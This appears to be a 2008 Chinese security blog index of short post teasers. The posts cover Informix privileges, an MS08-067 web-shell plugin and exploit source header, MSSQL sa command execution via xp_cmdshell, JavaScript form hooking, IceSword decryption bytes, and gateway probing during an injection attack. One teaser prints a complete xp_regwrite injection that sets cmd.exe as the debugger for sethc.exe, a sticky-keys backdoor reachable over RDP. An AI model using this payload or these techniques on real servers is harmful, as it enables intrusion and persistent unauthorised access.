鬼仔's Blog

by amxku
2008-10-29
http://www.amxku.net

在Informix中，有三个数据库特权级别：DBA、Resource 和 Connect
Connect 特权允许用户访问数据库以及添加、修改和删除数据。
Resource 特权授予用户所有 Connect 特权，还授予创建新的表、索引和过程的特权。
DBA 特权包括 Connect 和 Resurce 特权，还授予用户把 Resource、Connect 或DBA 特权授予其他用户的权力。具有DBA 特权的用户还可以删除数据库中的所有对象或完全删除数据库。
阅读全文 »

作者：cnqing

ASPXshell MS08-067插件
感谢hi群众兄测试，附赠几个插件。。。
1.扫可写目录插件
使用方法：设置扫描起始目录，设置扫描成功N个后停止，扫描。
阅读全文 »

转载请注明来源：BK瞬间群
首发Web安全手册

////////////////////////////////////////////////////////////////////////
                              sa执行命令方法总结

                                 By 无敌小黄瓜
////////////////////////////////////////////////////////////////////////

测试环境：windows xp pro sp2 + mssql 2005（服务以system权限启动）

一．xp_cmdshell
阅读全文 »

作者：刺

上一篇提到了如何做hook，也讲到了hook表单提交的几种不同方式。

今天要讲的是实现的一点细节。

我们知道，javascript中大部分的method都是非阻塞的，这样的好处是可以提高效率，坏处是很多时候我们确实是需要阻塞的功能。

极少数method是阻塞的，比如 alert()这个函数，在alert()执行完成并返回前，alert()之后的javascript代码都不会执行。
阅读全文 »

# 鬼仔：编译好的 ms08067.rar

Author:  Polymorphours
Email:   [email protected]
Homepage:http://www.whitecell.org
Date:    2008-10-28

#include "stdafx.h"
#include <winsock2.h>
#include <Rpc.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
#pragma comment(lib, "ws2_32")
 阅读全文 »

作者：MJ0011

icesword同驱动通讯时会将input buffer加密，下面是各版本的解密代码:

包括1.2, 1.18 , 1.2版本的中英文版本

unsigned char is_ddata_en[32] = {
0x10, 0x4F, 0xAC, 0x2D, 0x94, 0x97, 0x95, 0xEE, 0x93, 0x25, 0x8A, 0xB6, 0xD6, 0xBE, 0x49, 0x4D,
0x3F, 0x94, 0x1A, 0x91, 0x30, 0xC4, 0x7B, 0x08, 0x59, 0x38, 0x7C, 0x3B, 0x52, 0x40, 0xD2, 0xD2
};
阅读全文 »

版权所有：BK瞬间群
作者：BK群某饮料

1.能修改注册表
2.能访问3389

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--

阅读全文 »

作者：Innfen

上次导数据库的时候不幸把这个导丢了,今天刚好注射攻击的时候,那数据库机器没设置网关,那就自己加一个先试试看了,搞不好可以直接上网了,网关的ip不知道,只好写个批处理来探测,看运气咯
阅读全文 »